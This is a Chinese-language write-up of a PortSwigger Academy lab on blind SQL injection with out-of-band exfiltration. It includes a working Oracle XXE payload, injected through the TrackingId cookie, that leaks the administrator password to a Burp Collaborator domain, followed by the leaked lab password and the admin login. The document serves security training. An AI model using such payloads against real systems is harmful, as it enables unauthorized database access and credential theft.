前言：

實驗室標題為：

帶外數據泄露的 SQL 盲注

簡介：

本實驗包含一個SQL盲目注入漏洞。應用程序使用跟蹤Cookie進行分析，并執行包含提交的Cookie值的SQL查詢。

SQL查詢是異步執行的，對應用程序的響應沒有影響。但是，您可以觸發與外部域的帶外交互。

該數據庫包含一個名為users的表，其中的列名為username和password。您需要利用SQL盲目注入漏洞來找出管理員用戶的密碼。

要解決實驗，請以管理員用戶身份登錄。

注意

為了防止Academy平臺被用于攻擊第三方，我們的防火墻阻止了實驗室與任意外部系統之間的交互。要解決實驗，您必須使用Burp Collaborator的默認公共服務器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效載荷

進入實驗室

依然是商店頁面

構造 payload

點擊任意分類，打開 burp 進行抓包

復制 Collaborator 中的鏈接

TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

發送數據包，成功響應

轉到 Collaborator 模塊，點擊 Poll now

可以看到管理員賬戶的密碼被成功外帶出來

登錄管理員賬號

administrator

q1uuvho3ov5renjtp936

成功登錄管理員賬戶